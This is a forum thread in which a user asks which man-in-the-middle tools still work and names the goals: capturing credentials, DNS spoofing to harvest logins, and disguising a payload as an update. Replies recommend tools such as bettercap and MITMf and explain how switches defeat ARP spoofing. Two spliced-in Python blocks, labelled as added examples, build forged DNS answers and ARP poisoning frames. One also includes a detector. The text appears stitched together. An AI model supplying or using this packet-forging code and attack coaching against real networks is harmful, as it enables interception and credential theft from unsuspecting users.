
What MITM tools still work? ARP and DNS spoofing?


vailixi


I had this pretty nifty tool called Subterfuge a while back. It has a pretty nifty web interface and a cool code injection module that you can use with Metasploit. The problem is it doesn't seem to work anymore. :sad: There were some tools like Hamster, Ferret, Ettercap, and Firesheep that did this a while back. I'm not sure if any of those are really working. I tried messing around with Ettercap but I got a lot of errors. Not sure if I have etter.conf correct. Anybody still using Ettercap?

I know there have been some improvements to SSL that rendered sslstrip non-functional. Then SSLsplit came about as a replacement. I'm not really sure how a lot of the newer MITM stuff works. I'm also not really up on the technical aspect of IP forwarding and whatnot. But I'm serious about learning it.

Anybody want to point me in the direction of some still-working tutorials or talk through some attacks?

What I'm curious about:

Capturing credentials

Spoofing DNS and directing people to websites to harvest credentials

Spoofing so the target machine thinks my payload is an update or something else trusted.

Any of you guys doing this on the regular these days?

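On the "spoofing DNS" item: once a MITM is on the path (for example after ARP spoofing), it sees the victim's DNS query and can answer it before the real resolver does. Below is an added example, not code from the original post or from any tool named in this thread, that builds a DNS query, forges a matching A-record response pointing at an attacker-chosen address, and shows the only two checks a plain stub resolver performs on the reply (transaction ID and question match). The hostname `login.example.com`, the transaction IDs and the address `10.0.0.5` are constructed values for the demonstration; nothing is sent on the wire.

```python
"""Forged DNS answer at the byte level (RFC 1035 wire format), stdlib only.
Added example for this thread; no sockets are opened."""
import struct

TYPE_A, CLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """'login.example.com' -> b'\\x05login\\x07example\\x03com\\x00'."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data: bytes, off: int):
    """Decode an uncompressed name starting at off; return (name, next offset)."""
    labels = []
    while True:
        length = data[off]
        off += 1
        if length == 0:
            break
        labels.append(data[off:off + length].decode("ascii"))
        off += length
    return ".".join(labels), off


def build_query(txid: int, name: str, qtype: int = TYPE_A) -> bytes:
    """What a stub resolver sends: header with RD set, one question, no records."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, CLASS_IN)


def parse_query(pkt: bytes) -> dict:
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    name, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return {"txid": txid, "name": name, "qtype": qtype, "qclass": qclass,
            "question": pkt[12:off + 4]}  # raw question section, reused verbatim


def forge_response(query_pkt: bytes, spoofed_ip: str, ttl: int = 300) -> bytes:
    """The MITM's answer: same txid, same question, attacker-chosen A record.
    Flags 0x8180 = QR (response), RD, RA, RCODE NOERROR."""
    q = parse_query(query_pkt)
    header = struct.pack("!HHHHHH", q["txid"], 0x8180, 1, 1, 0, 0)
    # Answer RR: name is a compression pointer to offset 12 (the question name),
    # then TYPE A, CLASS IN, TTL, RDLENGTH 4 and the spoofed IPv4 address.
    rdata = bytes(int(o) for o in spoofed_ip.split("."))
    answer = struct.pack("!HHHIH", 0xC00C, TYPE_A, CLASS_IN, ttl, len(rdata)) + rdata
    return header + q["question"] + answer


def parse_response(pkt: bytes) -> dict:
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    name, off = decode_name(pkt, 12)
    off += 4  # skip QTYPE/QCLASS
    answers = []
    for _ in range(an):
        _ptr, rtype, rclass, rttl, rdlen = struct.unpack("!HHHIH", pkt[off:off + 12])
        off += 12
        rdata = pkt[off:off + rdlen]
        off += rdlen
        if rtype == TYPE_A:
            answers.append(".".join(str(b) for b in rdata))
    return {"txid": txid, "name": name, "answers": answers}


def resolver_accepts(query_pkt: bytes, response_pkt: bytes) -> bool:
    """A plain stub resolver only checks that the reply's transaction ID and
    question match what it sent (plus the UDP source port, not modelled here).
    An on-path MITM saw the query, so it satisfies both trivially; an off-path
    attacker would have to guess the 16-bit ID and the port."""
    q, r = parse_query(query_pkt), parse_response(response_pkt)
    return q["txid"] == r["txid"] and q["name"] == r["name"]


if __name__ == "__main__":
    query = build_query(0x1234, "login.example.com")     # constructed sample
    forged = forge_response(query, "10.0.0.5")           # attacker-chosen address
    print(parse_response(forged), resolver_accepts(query, forged))
```

The caveat a practitioner wants here: a forged A record only gets the victim to the attacker's host. For HTTPS the browser still validates the certificate for `login.example.com`, so credential harvesting via DNS spoofing alone works against cleartext HTTP or where the victim accepts an untrusted certificate, which is the same limit the thread's sslstrip discussion runs into.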

Hamster and Ferret, as well as Cain, still work on the Windows side. Same on Linux, along with many other tools, although you have a lot more to choose from there compared to Windows. It's a matter of targets: wireless is usually the easier to attack, while wired almost always gets hosed up quickly, if not right away, depending on the equipment. You can somewhat defeat ARP attacks (and hang the network in the process) if you use static entries everywhere on the LAN, and depending on the setup, even when correctly spoofed, sticky ports on equipment can thwart you: if the device sees the same MAC address on more than one port, it will only honor the first known port and block the second one. This is why wireless ARP spoofing attacks work so well, since there are no real checks other than nodes using static entries for ARP.

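To make the ARP side of that reply concrete, here is an added example that is not code from the original thread or from any of the tools named in it. It builds the two unsolicited ARP replies a classic poisoning attack sends (victim is told the gateway IP lives at the attacker's MAC, gateway is told the victim IP lives at the attacker's MAC), parses them back, and then runs them through a small watcher that behaves like the "static entries" defence described above: an IP that already has a known MAC is never moved to another one, and a reply that tries is flagged. All MAC and IP addresses are constructed values; nothing is put on the wire, and sending these frames for real would also need `net.ipv4.ip_forward=1` on the attacker so that traffic keeps flowing instead of the victim losing connectivity.

```python
"""ARP poisoning at the byte level, plus a detector for the IP-to-MAC conflicts
it produces. Added example for this thread; stdlib only, no packets are sent."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
ARP_FMT = "!HHBBH6s4s6s4s"   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp(opcode: int, sender_mac: str, sender_ip: str,
              target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame (14 bytes) carrying an RFC 826 ARP packet (28 bytes)."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(ARP_FMT,
                      1,        # hardware type: Ethernet
                      0x0800,   # protocol type: IPv4
                      6, 4,     # hardware / protocol address lengths
                      opcode,
                      mac_bytes(sender_mac), ip_bytes(sender_ip),
                      mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def poison_pair(attacker_mac: str, victim_mac: str, victim_ip: str,
                gateway_mac: str, gateway_ip: str):
    """The two replies a bidirectional ARP MITM repeats every few seconds.
    Neither answers a request; hosts without protection cache them anyway."""
    to_victim = build_arp(ARP_REPLY, attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp(ARP_REPLY, attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def parse_arp(frame: bytes) -> dict:
    dst, src, etype = struct.unpack("!6s6sH", frame[:14])
    if etype != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return {"op": op, "sender_mac": mac_str(sha), "sender_ip": ip_str(spa),
            "target_mac": mac_str(tha), "target_ip": ip_str(tpa),
            "eth_src": mac_str(src), "eth_dst": mac_str(dst)}


class ArpWatch:
    """Keeps the first MAC seen for each IP, the way a host with static ARP
    entries does. A later reply that moves an IP to a different MAC is the
    signature of poisoning and is recorded in self.alerts instead of applied."""

    def __init__(self, static=None):
        self.table = dict(static or {})   # pre-seeded static entries, IP -> MAC
        self.alerts = []                   # (ip, known_mac, claimed_mac)

    def observe(self, frame: bytes) -> bool:
        """Return True if the frame tried to rebind an already-known IP."""
        p = parse_arp(frame)
        if p["op"] != ARP_REPLY:
            return False
        ip, mac = p["sender_ip"], p["sender_mac"]
        known = self.table.setdefault(ip, mac)
        if known != mac:
            self.alerts.append((ip, known, mac))
            return True
        return False


if __name__ == "__main__":
    # Constructed lab values: attacker, victim and gateway on 192.168.1.0/24.
    to_victim, to_gateway = poison_pair("aa:aa:aa:aa:aa:aa",
                                        "bb:bb:bb:bb:bb:bb", "192.168.1.10",
                                        "cc:cc:cc:cc:cc:cc", "192.168.1.1")
    watch = ArpWatch({"192.168.1.1": "cc:cc:cc:cc:cc:cc"})  # static gateway entry
    print(parse_arp(to_victim))
    print("victim flagged:", watch.observe(to_victim), watch.alerts)
```

Note what the watcher does with the second frame: the victim IP has no static entry, so the attacker's claim is accepted as the first binding. That is exactly the gap the reply above points at; static entries only protect the addresses you actually pin, and the switch-side equivalent (a port that honours the first MAC it learned and blocks the same MAC on a second port) is what makes wired poisoning fail on managed equipment.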


The stuff of nightmares.


Try https://github.com/byt3bl33d3r/MITMf

or https://github.com/evilsocket/bettercap

I have tried both. MITMf has a lot of plugins; I even made a web UI for MITMf that collects data via XSS/PHP/MySQL: https://github.com/ivangr0zni/mitm-grabb3r

Trying out some of these. bettercap seems to be working just fine. Where does the -X option write the captured data to?



Look in the source? If not specified, most likely the same directory as the script, although you can try using a path to a file instead.

-O is output from what this looks like, but you can set a pcap file path as well. I haven't tried it or used the tool yet, just looking at:

https://github.com/evilsocket/bettercap/blob/master/bin/bettercap
